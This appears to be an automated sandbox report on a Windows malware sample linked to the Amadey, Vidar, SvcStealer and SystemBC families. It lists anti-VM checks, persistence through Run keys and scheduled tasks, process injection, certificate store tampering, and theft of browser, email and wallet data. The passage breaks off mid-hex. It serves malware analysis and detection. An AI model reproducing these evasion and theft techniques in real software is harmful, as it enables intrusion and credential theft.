Analysis Overview
SHA256
e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35
Threat Level: Known bad
The file e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe was found to be: Known bad.
Malicious Activity Summary
Detects SvcStealer Payload
Amadey
Svcstealer family
Vidar family
Amadey family
SvcStealer, Diamotrix
Systembc family
Vidar
SystemBC
Detect Vidar Stealer
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Checks BIOS information in registry
Executes dropped EXE
Reads user/profile data of local email clients
Loads dropped DLL
.NET Reactor proctector
Checks computer location settings
Identifies Wine through registry keys
Reads user/profile data of web browsers
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Drops file in Windows directory
Program crash
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 03:56
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 03:56
Reported
2025-03-05 03:59
Platform
win7-20240903-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects SvcStealer Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SvcStealer, Diamotrix
Svcstealer family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\defacfcbcbdbaac = "\"C:\\ProgramData\\defacfcbcbdbaac.exe\"" | C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\6eaad46262.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\6eaad46262.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE | N/A |
| N/A | N/A | C:\ProgramData\djrq\nbiciq.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2936 set thread context of 2460 | N/A | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe |
| PID 2648 set thread context of 1580 | N/A | C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| File created | C:\Windows\Tasks\futors.job | C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\djrq\nbiciq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c